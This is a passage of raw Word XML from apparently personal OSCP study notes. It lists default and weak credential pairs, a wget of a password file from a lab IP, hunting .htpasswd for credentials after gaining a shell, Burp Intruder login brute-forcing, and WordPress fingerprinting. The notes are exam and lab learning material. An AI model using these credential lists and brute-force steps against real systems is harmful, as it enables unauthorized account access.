    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000342">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bitnami:bitnami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000343">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">guest : guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000344">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at more default </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000345">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common weak credential pairs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000346">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000347">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000349">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:toor (root spelled backwards)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:password1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="961"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:password1</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Most common password list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000350">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Most common 2024</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000351">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you are in a page called /admin, then try username "admin"</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How to download files from website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000355">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you find something like a password list from a website, like https://10.10.10.10/passwd.txt, then you can download it quickly to local Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1384"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://10.10.10.10/passwd.txt</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Navigating a web server after getting inside (ex. Through reverse shell):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for interesting files like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htpasswd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(the "." at the start means hidden files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">htpasswd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file is used to store usernames and passwords for basic authentication of HTTP users. Let's read both file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This actually gave us the password for a user in </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, which eventually gave us root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.htaccess</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is typically used to secure directories with Apache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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zib9mi4bz239" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce website login using Burpsuite</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One example of bruteforcing website login using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burpsuite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</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Another example in </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Monster</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="259" name="image248.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image248.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="318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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from my test on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-B .249</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, send a POST request to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then select the parameter you want to bruteforce which is the password here and press the "Add" button on the top </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then "Load" your wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then Start attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000036E">
      <w:pPr>
        <w:ind w:left="-1350" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7592028" cy="2384394"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="399" name="image393.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image393.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="16826" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7592028" cy="23843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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, the "length" and "status code" were different for password "admin" which was the correct one</w:t>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_497vrd545obz" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if a site is wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000372">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="307" name="image316.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image316.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you look at source code and see stuff like wp-content or anything with "wp-…", then it's likely wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1448"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use tools like whatweb:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1448"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whatweb http://192.168.50.244</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="299" name="image294.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image294.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1448"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from 27.1.2. WEBSRV1</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g8ymg922qp7j" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse User Agents</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We can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
